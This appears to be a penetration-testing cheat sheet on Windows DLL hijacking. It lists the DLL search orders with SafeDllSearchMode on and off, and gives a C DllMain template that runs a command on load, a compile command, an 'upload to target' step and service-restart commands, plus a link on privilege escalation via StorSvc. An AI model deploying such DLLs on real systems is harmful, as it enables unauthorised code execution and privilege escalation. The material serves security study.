# DLL Hijacking

## Basics

### Search Orders
* __SafeDllSearchMode__ enabled searches paths in following order: 
    * __cwd__ of executable
    * System directory, `GetSystemDirectory`
    * 16-bit system directory 
    * Windows, `GetWindowsDirectory`
    * __pwd__
    * PATH

* __SafeDllSearchMode__ disabled searches in following order:
    * __cwd__ of executable
    * __pwd__ 
    * System directory
    * 16-bit system directory
    * Windows directory 
    * PATH environment variable

### Template
```C
#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
```
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart dllsvervice via
```sh
sc stop dllsvc
sc start dllsvc
```

## LPE via StorSvc

* [BlackArrowSec's repository](https://t.co/8XMvewhgFn)